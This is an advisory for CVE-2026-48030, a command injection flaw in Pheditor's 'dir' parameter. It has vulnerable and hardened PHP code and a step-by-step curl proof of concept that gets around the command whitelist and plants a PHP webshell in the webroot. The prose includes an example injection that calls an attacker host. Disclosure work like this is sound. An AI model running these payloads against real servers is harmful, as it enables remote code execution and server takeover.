PT-2026-48344 · Packagist · Pheditor/Pheditor

Published 2026-06-09 · Updated 2026-06-09 · CVE-2026-48030

CVSS v3.1: 9.9 Critical
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

An OS Command Injection vulnerability in the terminal action handler allows any authenticated user to execute arbitrary OS commands by injecting shell metacharacters into the 'dir' POST parameter, completely bypassing the TERMINAL_COMMANDS whitelist and achieving full Remote Code Execution with web server privileges.

Details

The terminal handler in pheditor.php accepts two POST parameters: command and dir. Shell metacharacters are validated on $command only; $dir is concatenated into the shell_exec() string without any sanitization.

Vulnerable code (pheditor.php, line 554–586):

$command = $_POST['command']; // ✓ metacharacters checked
$dir     = $_POST['dir'];     // ✗ NOT checked: vulnerable

if (strpos($command, '&') !== false ||
  strpos($command, ';') !== false ||
  strpos($command, '||') !== false) {
  die(...); // only guards $command, not $dir
}

$output = shell_exec(
  (empty($dir) ? null : 'cd ' . $dir . ' && ')
  . $command . ' && echo ; pwd' // ← $dir injected here
);

An attacker sends dir=/tmp; curl attacker.com # and, because the semicolon in $dir is never checked, the injected command executes freely.

Fix: replace $dir with escapeshellarg($dir) on line 586.
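The following PHP is an illustration added here, not code from Pheditor: it places the advisory's vulnerable command construction beside a hardened version that applies escapeshellarg() to $dir as the fix recommends, and prints both strings for a legitimate directory and for a value shaped like the injected one. The function names, the realpath() pre-check and the sample inputs are this example's own assumptions.

```php
<?php
// Added illustration, not Pheditor's own code. Function names, the realpath()
// pre-check and the sample inputs are assumptions made for this example.
declare(strict_types=1);

// Mirrors the construction quoted in the advisory: $dir is concatenated raw,
// so any shell metacharacter inside it becomes shell syntax.
function buildCommandVulnerable(string $command, string $dir): string
{
    return (empty($dir) ? '' : 'cd ' . $dir . ' && ')
        . $command . ' && echo ; pwd';
}

// Hardened form: $dir is wrapped by escapeshellarg(), which single-quotes the
// value and escapes embedded single quotes, so it reaches cd as one argument.
// The realpath() pre-check is extra defence in depth (an assumption of this
// example): the value is only accepted if it names an existing directory.
function buildCommandHardened(string $command, string $dir): string
{
    $cd = '';
    if ($dir !== '') {
        $real = realpath($dir);
        if ($real === false || !is_dir($real)) {
            throw new InvalidArgumentException('dir must be an existing directory');
        }
        $cd = 'cd ' . escapeshellarg($real) . ' && ';
    }
    // $command is assumed to have passed the whitelist check already; quoting
    // it whole would turn "ls -la" into a single program name, so it stays as-is.
    return $cd . $command . ' && echo ; pwd';
}

// Constructed sample inputs: a benign directory, and a value with the same
// shape as the injected one in the advisory (the part after ';' is harmless).
$samples = [
    'legitimate' => sys_get_temp_dir(),
    'injected'   => '/tmp; echo injected #',
];

foreach ($samples as $label => $dir) {
    echo "[$label] vulnerable:  ", buildCommandVulnerable('ls', $dir), PHP_EOL;
    try {
        echo "[$label] hardened:    ", buildCommandHardened('ls', $dir), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo "[$label] hardened:    rejected (", $e->getMessage(), ')', PHP_EOL;
    }
    // Quoting alone, without the directory check, already neutralises the
    // metacharacters: the whole value becomes one literal argument to cd.
    echo "[$label] quoted only: cd ", escapeshellarg($dir), ' && ls', PHP_EOL;
}
```

Run it with the php command-line binary. For the injected sample, the vulnerable builder leaves the semicolon as shell syntax, so whatever follows it would run as a separate command; the hardened builder rejects the value because no such directory exists, and even without that check escapeshellarg() hands cd a single quoted argument that fails harmlessly, so the rest of the && chain never runs. escapeshellarg() uses single quotes only on POSIX systems; on Windows it quotes with double quotes and replaces some characters with spaces, so the hardened form shown here is specific to a POSIX shell.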

PoC

Requirements: valid credentials, terminal permission enabled (default)

Step 1 — Authenticate:

curl -c cookies.txt -X POST http://TARGET/pheditor.php \
  -d "pheditor_password=admin" -L > /dev/null

Step 2 — Get CSRF token:

TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
  grep -o 'token = "[a-f0-9]*"' | \
  grep -o '"[a-f0-9]*"' | tr -d '"')

Step 3 — Confirm curl is blocked via command field:

curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=curl https://ifconfig.me" \
  --data-urlencode "dir=/tmp"

→ {"error":true,"message":"Command not allowed"}

Step 4 — Bypass whitelist via dir injection:

TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
  grep -o 'token = "[a-f0-9]*"' | \
  grep -o '"[a-f0-9]*"' | tr -d '"')

curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=ls" \
  --data-urlencode "dir=/tmp; curl -s https://ifconfig.me #"

→ {"error":false,"message":"OK","dir":"<PUBLIC IP>"}

Step 5 — Full RCE via webshell:

curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=ls" \
  --data-urlencode "dir=/var/www/html; echo '<?php system($_GET["c"]);?>' > /var/www/html/shell.php #"

curl "http://TARGET/shell.php?c=id"

→ uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impact

OS Command Injection (CWE-78). Any authenticated pheditor user with terminal permission enabled (default configuration) is able to:
  • Execute arbitrary OS commands as the web server user
  • Bypass the TERMINAL_COMMANDS whitelist entirely
  • Deploy persistent PHP webshells to the webroot
  • Read, write, or delete any file accessible to the web server
  • Potentially compromise other applications on the same server

Fix

Replace $dir with escapeshellarg($dir) in the shell_exec() call in pheditor.php (line 586), so that the directory value reaches the shell as a single quoted argument.

Weakness Enumeration

OS Command Injection (CWE-78)

Related Identifiers

CVE-2026-48030
GHSA-JVC5-6G7Q-C843

Affected Products

Pheditor/Pheditor